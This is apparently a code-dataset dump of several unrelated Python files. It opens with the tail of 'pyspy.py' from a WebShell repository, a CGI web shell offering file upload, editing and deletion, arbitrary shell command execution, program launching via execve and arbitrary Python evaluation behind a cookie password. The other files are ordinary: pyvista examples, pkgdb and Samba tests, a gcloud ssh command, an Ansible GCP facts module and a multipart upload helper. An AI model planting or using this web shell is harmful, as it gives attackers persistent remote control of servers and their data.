<form action="%s" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">
<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="./" type="hidden" /><input name="dir" value="./" type="hidden" /></div>
<a href="javascript:createdir();">Create Directory</a> |
<a href="javascript:createfile('%s');">Create File</a>
</td></tr></form>
<tr class="head"><td> </td><td>Filename</td><td width="16%%">Last modified</td><td width="10%%">Size</td><td width="20%%">Chmod / Perms</td><td width="22%%">Action</td></tr>
<tr class=alt1>
<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir('%s');">Parent Directory</a></td>
</tr>
<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>
""" % (self,current_dir,parent_dir)
dir_action = """
<a href="javascript:dofile('deldir','%s','Are you sure will delete test? \n\nIf non-empty directory, will be delete all the files.')">Del
</a>|
<a href="javascript:rename('%s');">Rename</a>
"""
file_action = """
<a href="javascript:dofile('downfile','%s');">Down</a> |
<a href="javascript:copyfile('%s');">Copy</a> |
<a href="javascript:opfile('editfile','%s','%s');">Edit</a> |
<a href="javascript:rename('%s');">Rename</a> |
<a href="javascript:opfile('newtime','%s','%s');">Time</a>
"""
lists = """
<tr class="%s" onmouseover="this.className='focus';" onmouseout="this.className='%s';">
<td> </td>
<td><a href="#" target="#">%s</a></td>
<td nowrap>%s</td>
<td nowrap>%s</td>
<td nowrap>
<a href="javascript:fileperm('%s');">%s</a> /
<a href="javascript:fileperm('%s');">%s</a>
</td>
<td nowrap>
%s
</td></tr>
"""
print forms+godir+manage
def getlist():
files = []
dirs = []
result = ""
dirlists = os.listdir(os.getcwd())
dirlists.sort()
for f in dirlists:
abspath = "%s%s%s" %(os.getcwd(),os.sep,f)
dirs.append(abspath) if os.path.isdir(abspath) else files.append(abspath)
for f in itertools.chain(dirs,files):
fstat = os.stat(f)
modified = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(fstat[stat.ST_MTIME]))
mode , perm = getPerms(f)
if os.path.isfile(f):
size = fstat[stat.ST_SIZE]
action = file_action % tuple([f for x in range(3)]+[os.path.dirname(f)]+[f for x in range(2)]+[os.path.dirname(f)])
else:
size = '-'
action = dir_action %(f,f)
res = lists % (bg(),bg(),f,modified,size,f,mode,f,perm,action)
result += res
return result
print getlist()
def do_shell():
log = "/c net start > %s%slog.txt" %(os.getcwd(),os.sep)
if sys.platform == "win32":
path ,args ,com = "c:\windows\system32\cmd.exe" ,log ,"ipconfig"
elif sys.platform == "linux2":
path ,args ,com = "/bin/bash" ,"--help" ,"ifconfig"
else:
path ,args ,com = "" ,"" ,""
shell_cmd = getvalue("command").strip()
shell_pro = getvalue("program").strip()
is_cmd = True if shell_cmd !="" else False
is_pro = True if shell_pro !="" else False
program = shell_pro or path
parameter = getvalue("parameter").strip() or args
command = shell_cmd or com
result = ""
if is_cmd:
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
result = "".join(p.stdout.readlines())
shell = """
<table width="100%%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<form name="form1" id="form1" action="" method="post" >
<h2>Execute Program »</h2>
<input id="action" type="hidden" name="action" value="shell" />
<p>Program<br /><input class="input" name="program" id="program" value="%s" type="text" size="100" /></p>
<p>
Parameter<br /><input class="input" name="parameter" id="parameter" value="%s" type="text" size="100" />
<input class="bt" name="submit" id="submit" value="Execute" type="submit" size="100" />
</p>
</form>
<form name="form1" id="form1" action="" method="post" >
<h2>Execute Command »</h2>
<input id="action" type="hidden" name="action" value="shell" />
<p>Command<br /><input class="input" name="command" id="command" value="%s" type="text" size="100" />
<input class="bt" name="submit" id="submit" value="Execute" type="submit" size="100" /></p>
</form>
<pre> %s </pre>
</td></tr>
</table>
""" % (program,parameter,command,result)
print shell
if is_pro:
os.execve(program, parameter.split(), os.environ)
def do_env():
def os():
if sys.platform.startswith('l'):
return "Linux"
elif sys.platform.startswith('w'):
return "Windows"
elif sys.platform.startswith('d'):
return "Mac"
elif sys.platform.startswith('o'):
return "OS"
else:
return "Unknown"
server ={}
python ={}
server['Server Time'] = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())
server['Server Domain'] = getvalue("SERVER_NAME")
server['Server IP'] = socket.gethostbyname(server['Server Domain']) or "Unknown"
server['Server OS'] = os()
server['Server Software'] = getvalue("SERVER_SOFTWARE") or "Unknown"
server['Cgi Path'] = getvalue("PATH_INFO") or "Unknown"
serverInfo = ""
pythonInfo = ""
for k ,v in server.items():
serverInfo += "<li><u>%s:</u> %s</li>" % (k, v)
for k ,v in python.items():
pythonInfo += "<li><u>%s:</u> %s</li>" % (k, v)
env = """
<table width="100%%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<h2>Server »</h2>
<ul class="info">
%s
</ul>
<h2>Python »</h2>
<ul class="info">
%s
<h2>waitting for you to add!!!</h2>
</ul>
</tr></td>
</table>
""" %(serverInfo,pythonInfo)
print env
def do_eval():
code = getvalue("pythoncode")
tmp = open("temp.py","w")
tmp.write(code)
tmp.close()
file=StringIO.StringIO()
if code != "":
stdout=sys.stdout
sys.stdout=file
try:
execfile("temp.py")
except Exception,e:
file.write(str(e))
sys.stdout=stdout
os.remove("temp.py")
eval = """
<table width="100%%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<form name="form1" id="form1" action="" method="post" >
<h1> <pre>%s</pre> </h1>
<h2>Eval Python Code »</h2>
<input id="action" type="hidden" name="action" value="eval" />
<p>Python Code<br /><textarea class="area" id="phpcode" name="pythoncode" cols="100" rows="15" >%s</textarea></p>
<p><input class="bt" name="submit" id="submit" type="submit" value="Submit"></p>
</form>
</td></tr></table>
""" % (file.getvalue(),code)
print eval
def login():
if admin["check"]:
if getvalue("doing") == "login":
if admin["pass"] == getvalue("password"):
print "Set-Cookie:Pyspypass=%s" % admin["pass"]
#print "Set-Cookie:Expires=Tuesday, 31-Dec-2014 23:12:40 GMT"
print "Content-type:text/html"
print
index()
return
if getcookie('Pyspypass') != admin['pass']:
print "Content-type:text/html"
print
loginpage()
else:
print "Content-type:text/html"
print
index()
if __name__ == '__main__':
login()
|
xl7dev/WebShell
|
python/pyspy.py
|
Python
|
gpl-2.0
| 18,487
|
from wtypes.scope import WScope
from wtypes.string import WString
class WModule(WScope):
name = None
def __init__(self, builtins_module=None, name=None, filename=None):
super().__init__(builtins_module=builtins_module)
self['__module__'] = self
if name:
if isinstance(name, str):
name = WString(name)
self['__name__'] = name
self.name = name
if filename:
if isinstance(filename, str):
filename = WString(filename)
self['__file__'] = filename
if builtins_module is not None:
self['__builtins__'] = builtins_module
def __str__(self):
if self.name:
return f'WModule("{self.name}", {len(self)} keys)'
return f'WModule("{len(self)} keys)'
|
izrik/wodehouse
|
wtypes/module.py
|
Python
|
gpl-2.0
| 822
|
from collections import OrderedDict
from wazimap.data.utils import get_stat_data
MEAT_RECODES = OrderedDict([
('BUFF', 'Water Buffalo'),
('CHEVON', 'Goat'),
('CHICKEN', 'Chicken'),
('DUCK', 'Duck'),
('MUTTON', 'Mutton'),
('PORK', 'Pork')
])
LIVESTOCK_RECODES = OrderedDict([
('BUFFALOES', 'Water Buffalo'),
('CATTLE', 'Cattle'),
('DUCKS', 'Ducks'),
('FOWL', 'Fowl'),
('GOATS', 'Goats'),
('PIGS', 'Pigs'),
('SHEEP', 'Sheep')
])
MILK_ANIMAL_RECODES = OrderedDict([
('BUFFALOES', 'Water Buffaloes'),
('COWS', 'Cows')
])
MILK_RECODES = OrderedDict([
('BUFFALO_MILK', 'Water Buffalo Milk'),
('COW_MILK', 'Cow Milk')
])
EGG_RECODES = OrderedDict([
('HEN_EGGS', 'Hen Eggs'),
('DUCK_EGGS', 'Duck Eggs')
])
EGG_LAYER_RECODES = OrderedDict([
('HENS', 'Hens'),
('DUCKS', 'Ducks')
])
def get_agriculture_profile(geo_code, geo_level, session):
agriculture_data = {'area_has_data': False}
if geo_level != 'vdc':
meat_dist, total_meat = get_stat_data(
'meat type', geo_level, geo_code, session,
recode=dict(MEAT_RECODES),
percent=False,
order_by='-total')
livestock_dist, total_livestock = get_stat_data(
'livestock type', geo_level, geo_code, session,
recode=dict(LIVESTOCK_RECODES),
percent=False,
order_by='-total')
milk_animal_dist, total_milk_animals = get_stat_data(
'milk animal type', geo_level, geo_code, session,
recode=dict(MILK_ANIMAL_RECODES),
percent=False,
order_by='-total')
milk_dist, total_milk = get_stat_data(
'milk type', geo_level, geo_code, session,
recode=dict(MILK_RECODES),
percent=False,
order_by='-total')
egg_dist, total_eggs = get_stat_data(
'egg type', geo_level, geo_code, session,
recode=dict(EGG_RECODES),
percent=False,
order_by='-total')
egg_layer_dist, total_egg_layers = get_stat_data(
'egg layer type', geo_level, geo_code, session,
recode=dict(EGG_LAYER_RECODES),
percent=False,
order_by='-total')
agriculture_data = dict(
is_vdc=False,
area_has_data=True,
meat_distribution=meat_dist,
total_meat={
'name': 'Metric tons of meat produced',
'values': {'this': total_meat}
},
livestock_distribution=livestock_dist,
total_livestock={
'name': 'Number of livestock',
'values': {'this': total_livestock}
},
milk_animal_distribution=milk_animal_dist,
total_milk_animals={
'name': 'Number of milk animals',
'values': {'this': total_milk_animals}
},
milk_distribution=milk_dist,
total_milk={
'name': 'Metric tons of milk',
'values': {'this': total_milk}
},
egg_distribution=egg_dist,
total_eggs={
'name': 'Number of eggs',
'values': {'this': total_eggs}
},
egg_layer_distribution=egg_layer_dist,
total_egg_layers={
'name': 'Number of laying hens and ducks',
'values': {'this': total_egg_layers}
},
)
return agriculture_data
|
cliftonmcintosh/nepalmap_app
|
wazimap_np/agriculture.py
|
Python
|
mit
| 3,537
|
#!/usr/bin/env python
# Snippet from http://code.activestate.com/recipes/146306/
import httplib, mimetypes
def post_multipart(host, selector, fields, files):
"""
Post fields and files to an http host as multipart/form-data.
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, filename, value) elements for data to be uploaded as files
Return the server's response page.
"""
content_type, body = encode_multipart_formdata(fields, files)
h = httplib.HTTPS(host)
h.putrequest('POST', selector)
h.putheader('content-type', content_type)
h.putheader('content-length', str(len(body)))
h.endheaders()
h.send(body)
errcode, errmsg, headers = h.getreply()
return h.file.read()
def encode_multipart_formdata(fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, filename, value) elements for data to be uploaded as files
Return (content_type, body) ready for httplib.HTTP instance
"""
BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'
CRLF = '\r\n'
L = []
for (key, value) in fields:
L.append('--' + BOUNDARY)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
for (key, filename, value) in files:
L.append('--' + BOUNDARY)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
L.append('Content-Type: %s' % get_content_type(filename))
L.append('')
L.append(value)
L.append('--' + BOUNDARY + '--')
L.append('')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
|
kevthehermit/Maildb
|
core/vtpostfile.py
|
Python
|
gpl-3.0
| 1,896
|
# -*- coding: utf-8 -*-
#
# Copyright © 2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions
# of the GNU General Public License v.2, or (at your option) any later
# version. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission
# of Red Hat, Inc.
#
'''
pkgdb tests for the Collection object.
'''
__requires__ = ['SQLAlchemy >= 0.8']
import pkg_resources
import unittest
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(
os.path.abspath(__file__)), '..'))
from pkgdb2.lib import model
from tests import Modeltests, create_collection
class Collectiontests(Modeltests):
""" Collection tests. """
def test_init_collection(self):
""" Test the __init__ function of Collection. """
create_collection(self.session)
self.assertEqual(5, len(model.Collection.all(self.session)))
def test_repr_collection(self):
""" Test the __repr__ function of Collection. """
create_collection(self.session)
collections = sorted(
model.Collection.all(self.session), key=lambda x: x.branchname)
self.assertEqual(collections[0].branchname, 'el4')
self.assertEqual(collections[1].branchname, 'el6')
self.assertEqual("Collection(u'Fedora', u'17', u'Active', "
"owner:u'toshio')",
collections[2].__repr__())
self.assertEqual(collections[3].branchname, 'f18')
def test_search(self):
""" Test the search function of Collection. """
create_collection(self.session)
collections = model.Collection.search(self.session, 'EPEL%')
self.assertEqual(len(collections), 0)
collections = model.Collection.search(self.session, 'f%', 'Active')
self.assertEqual("Collection(u'Fedora', u'17', u'Active', "
"owner:u'toshio')",
collections[0].__repr__())
collections = model.Collection.search(self.session, 'f%')
self.assertEqual(2, len(collections))
cnt = model.Collection.search(self.session, 'f%', count=True)
self.assertEqual(2, cnt)
collections = model.Collection.search(
session=self.session,
clt_name='f%',
offset=1)
self.assertEqual(1, len(collections))
collections = model.Collection.search(
session=self.session,
clt_name='f%',
limit=1)
self.assertEqual(1, len(collections))
def test_to_json(self):
""" Test the to_json function of Collection. """
create_collection(self.session)
collection = model.Collection.by_name(self.session, 'f18')
collection = collection.to_json()
self.assertEqual(
set(collection.keys()), set(['branchname', 'version',
'name', 'status',
'dist_tag', 'koji_name']))
if __name__ == '__main__':
SUITE = unittest.TestLoader().loadTestsFromTestCase(Collectiontests)
unittest.TextTestRunner(verbosity=2).run(SUITE)
|
crobinso/pkgdb2
|
tests/test_collection.py
|
Python
|
gpl-2.0
| 3,810
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements the command for SSHing into an instance."""
import sys
from googlecloudsdk.api_lib.compute import gaia_utils
from googlecloudsdk.api_lib.compute import ssh_utils
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
def _Args(parser):
"""Argument parsing for ssh, including hook for remote completion."""
ssh_utils.BaseSSHCLICommand.Args(parser)
parser.add_argument(
'--command',
help='A command to run on the virtual machine.')
ssh_flags = parser.add_argument(
'--ssh-flag',
action='append',
help='Additional flags to be passed to ssh.')
ssh_flags.detailed_help = """\
Additional flags to be passed to *ssh(1)*. It is recommended that flags
be passed using an assignment operator and quotes. This flag will
replace occurences of ``%USER%'' and ``%INSTANCE%'' with their
dereferenced values. Example:
$ {command} example-instance --zone us-central1-a --ssh-flag="-vvv" --ssh-flag="-L 80:%INSTANCE%:80"
is equivalent to passing the flags ``--vvv'' and ``-L
80:162.222.181.197:80'' to *ssh(1)* if the external IP address of
'example-instance' is 162.222.181.197.
"""
parser.add_argument(
'--container',
help="""\
The name of a container inside of the virtual machine instance to
connect to. This only applies to virtual machines that are using
a Google container virtual machine image. For more information,
see link:https://cloud.google.com/compute/docs/containers[].
""")
user_host = parser.add_argument(
'user_host',
completion_resource='compute.instances',
help='Specifies the instance to SSH into.',
metavar='[USER@]INSTANCE')
user_host.detailed_help = """\
Specifies the instance to SSH into.
``USER'' specifies the username with which to SSH. If omitted,
$USER from the environment is selected.
"""
implementation_args = parser.add_argument(
'implementation_args',
nargs='*',
help="""\
Flags and positionals passed to the underlying ssh implementation.
""",
metavar='-- IMPLEMENTATION-ARGS')
implementation_args.detailed_help = """\
Flags and positionals passed to the underlying ssh implementation.
The '--' argument must be specified between gcloud specific args on
the left and IMPLEMENTATION-ARGS on the right. Example:
$ {command} example-instance --zone us-central1-a -- -vvv -L 80:%INSTANCE%:80
"""
utils.AddZoneFlag(
parser,
resource_type='instance',
operation_type='connect to')
@base.ReleaseTracks(base.ReleaseTrack.GA)
class SshGA(ssh_utils.BaseSSHCLICommand):
"""SSH into a virtual machine instance."""
def __init__(self, *args, **kwargs):
super(SshGA, self).__init__(*args, **kwargs)
self._use_accounts_service = False
@staticmethod
def Args(parser):
_Args(parser)
def Run(self, args):
super(SshGA, self).Run(args)
parts = args.user_host.split('@')
if len(parts) == 1:
if self._use_accounts_service: # Using Account Service.
user = gaia_utils.GetDefaultAccountName(self.http)
else: # Uploading keys through metadata.
user = ssh_utils.GetDefaultSshUsername(warn_on_account_user=True)
instance = parts[0]
elif len(parts) == 2:
user, instance = parts
else:
raise exceptions.ToolException(
'Expected argument of the form [USER@]INSTANCE; received [{0}].'
.format(args.user_host))
instance_ref = self.CreateZonalReference(instance, args.zone)
instance = self.GetInstance(instance_ref)
external_ip_address = ssh_utils.GetExternalIPAddress(instance)
ssh_args = [self.ssh_executable]
if not args.plain:
ssh_args.extend(self.GetDefaultFlags())
# Allocates a tty if no command was provided and a container was provided.
if args.container and not args.command:
ssh_args.append('-t')
if args.ssh_flag:
for flag in args.ssh_flag:
dereferenced_flag = (
flag.replace('%USER%', user)
.replace('%INSTANCE%', external_ip_address))
ssh_args.append(dereferenced_flag)
ssh_args.append(ssh_utils.UserHost(user, external_ip_address))
if args.implementation_args:
ssh_args.extend(args.implementation_args)
if args.container:
ssh_args.append('--')
ssh_args.append('container_exec')
ssh_args.append(args.container)
# Runs the given command inside the given container if --command was
# specified, otherwise runs /bin/sh.
if args.command:
ssh_args.append(args.command)
else:
ssh_args.append('/bin/sh')
elif args.command:
ssh_args.append('--')
ssh_args.append(args.command)
# Don't use strict error checking for ssh: if the executed command fails, we
# don't want to consider it an error. We do, however, want to propagate its
# return code.
return_code = self.ActuallyRun(
args, ssh_args, user, instance, strict_error_checking=False,
use_account_service=self._use_accounts_service)
if return_code:
# Can't raise an exception because we don't want any "ERROR" message
# printed; the output from `ssh` will be enough.
sys.exit(return_code)
@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA)
class SshBeta(SshGA):
"""SSH into a virtual machine instance."""
def __init__(self, *args, **kwargs):
super(SshBeta, self).__init__(*args, **kwargs)
self._use_accounts_service = True
@staticmethod
def Args(parser):
_Args(parser)
def DetailedHelp(version):
"""Construct help text based on the command release track."""
detailed_help = {
'brief': 'SSH into a virtual machine instance',
'DESCRIPTION': """\
*{command}* is a thin wrapper around the *ssh(1)* command that
takes care of authentication and the translation of the
instance name into an IP address.
This command ensures that the user's public SSH key is present
in the project's metadata. If the user does not have a public
SSH key, one is generated using *ssh-keygen(1)* (if the `--quiet`
flag is given, the generated key will have an empty passphrase).
""",
'EXAMPLES': """\
To SSH into 'example-instance' in zone ``us-central1-a'', run:
$ {command} example-instance --zone us-central1-a
You can also run a command on the virtual machine. For
example, to get a snapshot of the guest's process tree, run:
$ {command} example-instance --zone us-central1-a --command "ps -ejH"
If you are using the Google container virtual machine image, you
can SSH into one of your containers with:
$ {command} example-instance --zone us-central1-a --container CONTAINER
""",
}
if version == 'BETA':
detailed_help['DESCRIPTION'] = """\
*{command}* is a thin wrapper around the *ssh(1)* command that
takes care of authentication and the translation of the
instance name into an IP address.
This command uses the Compute Accounts API to ensure that the user's
public SSH key is availibe to the VM. This form of key management
will only work with VMs configured to work with the Compute Accounts
API. If the user does not have a public SSH key, one is generated using
*ssh-keygen(1)* (if `the --quiet` flag is given, the generated key will
have an empty passphrase).
"""
return detailed_help
SshGA.detailed_help = DetailedHelp('GA')
SshBeta.detailed_help = DetailedHelp('BETA')
|
flgiordano/netcash
|
+/google-cloud-sdk/lib/surface/compute/ssh.py
|
Python
|
bsd-3-clause
| 8,389
|
"""
.. _ref_parametric_example:
Parametric Geometric Objects
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Creating parametric objects
"""
# sphinx_gallery_thumbnail_number = 12
import pyvista as pv
from math import pi
###############################################################################
# This example demonstrates how to plot parametric objects using pyvista
#
# Supertoroid
# +++++++++++
supertoroid = pv.ParametricSuperToroid(n1=0.5)
supertoroid.plot(color="tan", smooth_shading=True)
###############################################################################
# Parametric Ellipsoid
# ++++++++++++++++++++
# Ellipsoid with a long x axis
ellipsoid = pv.ParametricEllipsoid(10, 5, 5)
ellipsoid.plot(color="tan")
###############################################################################
# Partial Parametric Ellipsoid
# ++++++++++++++++++++++++++++
# cool plotting direction
cpos = [
(21.9930, 21.1810, -30.3780),
(-1.1640, -1.3098, -0.1061),
(0.8498, -0.2515, 0.4631),
]
# half ellipsoid
part_ellipsoid = pv.ParametricEllipsoid(10, 5, 5, max_v=pi / 2)
part_ellipsoid.plot(color="tan", smooth_shading=True, cpos=cpos)
###############################################################################
# Pseudosphere
# ++++++++++++
pseudosphere = pv.ParametricPseudosphere()
pseudosphere.plot(color="tan", smooth_shading=True)
###############################################################################
# Bohemian Dome
# +++++++++++++
bohemiandome = pv.ParametricBohemianDome()
bohemiandome.plot(color="tan")
###############################################################################
# Bour
# ++++
bour = pv.ParametricBour()
bour.plot(color="tan")
###############################################################################
# Boy's Surface
# +++++++++++++
boy = pv.ParametricBoy()
boy.plot(color="tan")
###############################################################################
# Catalan Minimal
# +++++++++++++++
catalanminimal = pv.ParametricCatalanMinimal()
catalanminimal.plot(color="tan")
###############################################################################
# Conic Spiral
# ++++++++++++
conicspiral = pv.ParametricConicSpiral()
conicspiral.plot(color="tan")
###############################################################################
# Cross Cap
# +++++++++
crosscap = pv.ParametricCrossCap()
crosscap.plot(color="tan")
###############################################################################
# Dini
# ++++
dini = pv.ParametricDini()
dini.plot(color="tan")
###############################################################################
# Enneper
# +++++++
enneper = pv.ParametricEnneper()
enneper.plot(cpos="yz")
###############################################################################
# Figure-8 Klein
# ++++++++++++++
figure8klein = pv.ParametricFigure8Klein()
figure8klein.plot()
###############################################################################
# Henneberg
# +++++++++
henneberg = pv.ParametricHenneberg()
henneberg.plot(color="tan")
###############################################################################
# Klein
# +++++
klein = pv.ParametricKlein()
klein.plot(color="tan")
###############################################################################
# Kuen
# ++++
kuen = pv.ParametricKuen()
kuen.plot(color="tan")
###############################################################################
# Mobius
# ++++++
mobius = pv.ParametricMobius()
mobius.plot(color="tan")
###############################################################################
# Plucker Conoid
# ++++++++++++++
pluckerconoid = pv.ParametricPluckerConoid()
pluckerconoid.plot(color="tan")
###############################################################################
# Random Hills
# ++++++++++++
randomhills = pv.ParametricRandomHills()
randomhills.plot(color="tan")
###############################################################################
# Roman
# +++++
roman = pv.ParametricRoman()
roman.plot(color="tan")
###############################################################################
# Super Ellipsoid
# +++++++++++++++
superellipsoid = pv.ParametricSuperEllipsoid(n1=0.1, n2=2)
superellipsoid.plot(color="tan")
###############################################################################
# Torus
# +++++
torus = pv.ParametricTorus()
torus.plot(color="tan")
###############################################################################
# Circular Arc
# ++++++++++++
pointa = [-1, 0, 0]
pointb = [0, 1, 0]
center = [0, 0, 0]
resolution = 100
arc = pv.CircularArc(pointa, pointb, center, resolution)
pl = pv.Plotter()
pl.add_mesh(arc, color='k', line_width=4)
pl.show_bounds()
pl.view_xy()
pl.show()
###############################################################################
# Extruded Half Arc
# +++++++++++++++++
pointa = [-1, 0, 0]
pointb = [1, 0, 0]
center = [0, 0, 0]
resolution = 100
arc = pv.CircularArc(pointa, pointb, center, resolution)
poly = arc.extrude([0, 0, 1])
poly.plot(color="tan", cpos='iso', show_edges=True)
|
akaszynski/vtkInterface
|
examples/00-load/create-parametric-geometric-objects.py
|
Python
|
mit
| 5,082
|
# test_socket_wraper.py -- The tests for selftest socket wrapper routines
# Copyright (C) 2012 Jelmer Vernooij <jelmer@samba.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Tests for selftest/socket_wrapper."""
from selftest.tests import TestCase
from selftest import socket_wrapper
import os
class SocketWrapperTests(TestCase):
def test_setup_pcap(self):
socket_wrapper.setup_pcap("somefile")
self.assertEquals("somefile", os.environ["SOCKET_WRAPPER_PCAP_FILE"])
def test_set_default_iface(self):
socket_wrapper.set_default_iface(4)
self.assertEquals("4", os.environ["SOCKET_WRAPPER_DEFAULT_IFACE"])
|
javierag/samba
|
selftest/tests/test_socket_wrapper.py
|
Python
|
gpl-3.0
| 1,327
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_global_address_facts
description:
- Gather facts for GCP GlobalAddress
short_description: Gather facts for GCP GlobalAddress
version_added: 2.7
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters.)
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: " a global address facts"
gcp_compute_global_address_facts:
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: facts
'''
RETURN = '''
items:
description: List of items
returned: always
type: complex
contains:
address:
description:
- The static external IP address represented by this resource.
returned: success
type: str
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
id:
description:
- The unique identifier for the resource. This identifier is defined by the
server.
returned: success
type: int
name:
description:
- Name of the resource. Provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
ipVersion:
description:
- The IP Version that will be used by this address. Valid options are `IPV4`
or `IPV6`. The default value is `IPV4`.
returned: success
type: str
region:
description:
- A reference to the region where the regional address resides.
returned: success
type: str
addressType:
description:
- The type of the address to reserve, default is EXTERNAL.
- "* EXTERNAL indicates public/external single IP address."
- "* INTERNAL indicates internal IP ranges belonging to some network."
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest
import json
################################################################################
# Main
################################################################################
def main():
module = GcpModule(argument_spec=dict(filters=dict(type='list', elements='str')))
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
items = fetch_list(module, collection(module), query_options(module.params['filters']))
if items.get('items'):
items = items.get('items')
else:
items = []
return_value = {'items': items}
module.exit_json(**return_value)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/addresses".format(**module.params)
def fetch_list(module, link, query):
auth = GcpSession(module, 'compute')
response = auth.get(link, params={'filter': query})
return return_if_object(module, response)
def query_options(filters):
if not filters:
return ''
if len(filters) == 1:
return filters[0]
else:
queries = []
for f in filters:
# For multiple queries, all queries should have ()
if f[0] != '(' and f[-1] != ')':
queries.append("(%s)" % ''.join(f))
else:
queries.append(f)
return ' '.join(queries)
def return_if_object(module, response):
# If not found, return nothing.
if response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
if __name__ == "__main__":
main()
|
alxgu/ansible
|
lib/ansible/modules/cloud/google/gcp_compute_global_address_facts.py
|
Python
|
gpl-3.0
| 6,130
|
import os
import unittest
import sys
from PyQt5 import QtGui
from PyQt5 import QtWidgets
"""
Unit tests for the QT GUI
=========================
In order to run the tests, first install SasView and sasmodels to site-packages
by running ``python setup.py install`` in both repositories.
The tests can be run with ``python GUITests.py``, or
``python GUITests.py suiteName1 suiteName2 ...`` for a subset of tests.
To get more verbose console output (recommended), use ``python GUITests.py -v``
"""
# List of all suite names. Every time a new suite is added, its name should
# also be added here
ALL_SUITES = [
'calculatorsSuite',
'mainSuite',
'fittingSuite',
'plottingSuite',
'utilitiesSuite',
'corfuncPerspectiveSuite',
'invariantPerspectiveSuite',
'inversionPerspectiveSuite',
]
# Prepare the general QApplication instance
app = QtWidgets.QApplication(sys.argv)
# Main Window
